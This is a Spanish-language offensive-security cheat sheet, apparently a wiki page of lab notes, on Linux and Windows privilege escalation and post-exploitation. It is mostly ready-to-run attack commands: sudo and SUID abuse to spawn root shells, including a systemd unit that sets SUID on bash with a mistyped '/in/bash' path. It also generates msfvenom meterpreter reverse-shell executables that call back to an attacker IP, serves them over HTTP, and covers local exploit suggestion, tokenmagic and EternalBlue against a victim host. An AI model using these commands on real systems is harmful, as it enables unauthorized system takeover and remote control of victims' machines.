Escalada de Privilegios + Post Explotación
Escalada de Privilegios en Linux – Sudo -l
Subimos el payload a través del protocolo FTP. Nos ponemos en escucha mientras carga la página para la Reverse Shell. Hacemos tratamiento de la TTY.
sudo -lCon el comando proporcionado en la página debemos de poner la ruta absoluta.
Escalada de Privilegios en Linux – Sudo -l | Parte 2
sudo -l 
sudo /usr/bin/less /etc/profile
!/bin/shEscalada de Privilegios en Linux – Binarios SUID
Otra técnica muy frecuente para escalar privilegios en Linux es la enumeración de binarios SUID, donde podremos conocer que binarios tienen setuid 0 y podemos utilizarlos para escalar privilegios en Linux.
find / -perm -4000 2>/dev/nullEn el directorio /tmp, creamos un archivo en bash con este contenido.
TF=$(mktemp).service
echo '[Service]
Type=oneshot
ExecStart=/bin/sh -c "chmod u+s /in/bash"
[Install]
WantedBy=multi-user.target' > $TF
/bin/systemctl link $TF
/bin/systemctl enable --now $TFEjecutamos.
bash archivo.shHemos abusado de un binario. Ya somos root.
bash -pEscalada de Privilegios en Linux – Binarios SUID | Parte 2
find / -perm -4000 2>/dev/nullenv /bin/sh -pEscalada de Privilegios Automática con Metasploit en Linux & Windows
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<IP máquina atacante> LPORT=4444 -f exe -o virus.exeSi no es de 64 bits.
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP máquina atacante> LPORT=4444 -f exe -o virus.exeLo compartimos en un servidor en Python.
python3 -m http.server 80Ponemos la IP en el buscador y nos descargamos el Python. Nos ponemos en escucha mediante Metasploit.
msfconsole
use multi/handler
show options
set LHOST <IP máquina atacante>
set PAYLOAD windows/meterpreter/reverse_tcp
run Ejecutamos nuestro payload. Somos un usuario normal por lo que hay que escalar privilegios.
background 
search local_exploit_suggester
show options
sessions -l
set SESSION 1 
runNos salen los exploits operativos pero hay que probar uno a uno.
use windows/local/tokenmagic
show options
set SESSION 1
set LHOST <IP máquina atacante>
set LPORT 5555
runEnumeración de Usuarios en Sistemas Windows
msfconsole 
search eternalblue 
use 0
show options
set RHOSTS <IP máquina víctima>
runEn meterpreter.
shell
net usersEl comando net users para poder ver los usuarios existentes dentro de un sistema Windows.
Last updated
Was this helpful?
